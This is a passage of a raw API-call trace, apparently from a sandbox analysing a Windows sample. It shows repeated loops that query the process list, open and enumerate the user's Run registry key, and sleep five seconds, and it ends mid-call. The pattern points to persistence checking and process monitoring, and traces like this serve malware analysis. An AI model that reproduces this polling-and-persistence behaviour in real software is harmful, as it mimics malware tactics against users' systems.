[0178.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.799] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.807] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.808] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.808] NtClose (Handle=0x274) returned 0x0 [0178.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.818] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.827] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.828] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.829] NtClose (Handle=0x274) returned 0x0 [0178.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.845] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.857] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.858] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.858] NtClose (Handle=0x274) returned 0x0 [0178.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.867] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.969] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.970] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.970] NtClose (Handle=0x274) returned 0x0 [0178.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.980] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.983] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.984] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.984] NtClose (Handle=0x274) returned 0x0 [0178.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.992] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.002] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.003] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.003] NtClose (Handle=0x274) returned 0x0 [0179.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.013] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.018] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.019] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.020] NtClose (Handle=0x274) returned 0x0 [0179.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.030] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.032] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.033] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.033] NtClose (Handle=0x274) returned 0x0 [0179.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.041] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.049] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.049] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.049] NtClose (Handle=0x274) returned 0x0 [0179.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.059] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.063] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.064] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.064] NtClose (Handle=0x274) returned 0x0 [0179.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.072] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.076] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.077] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.077] NtClose (Handle=0x274) returned 0x0 [0179.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.084] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.086] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.086] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.086] NtClose (Handle=0x274) returned 0x0 [0179.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.095] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.097] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.098] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.098] NtClose (Handle=0x274) returned 0x0 [0179.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.105] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.107] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, 